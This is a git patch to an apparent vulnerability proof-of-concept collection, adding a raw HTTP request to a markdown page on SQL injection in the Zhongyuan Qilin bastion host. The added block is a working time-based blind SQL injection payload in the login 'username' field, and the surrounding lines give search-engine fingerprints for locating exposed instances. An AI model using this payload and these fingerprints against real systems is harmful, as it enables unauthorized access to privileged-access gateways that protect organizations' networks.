From 2496f1ac57e582f63cecedf85c88e9bb1612edf6 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 14 Sep 2023 17:50:04 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E4=B8=AD=E8=BF=9C=E9=BA=92=E9=BA=9F?=
 =?UTF-8?q?=E5=A0=A1=E5=9E=92=E6=9C=BASQL=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 中远麒麟堡垒机SQL注入.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/中远麒麟堡垒机SQL注入.md b/中远麒麟堡垒机SQL注入.md
index 6fd03cf..fd457ee 100644
--- a/中远麒麟堡垒机SQL注入.md
+++ b/中远麒麟堡垒机SQL注入.md
@@ -33,3 +33,16 @@ poc:
 检索条件：
 cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 或 body="admin.php?controller=admin_index&action=login"
 
+## 请求包
+```
+POST /admin.php?controller=admin_commonuser HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+Connection: close
+Content-Length: 78
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+
+username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
+```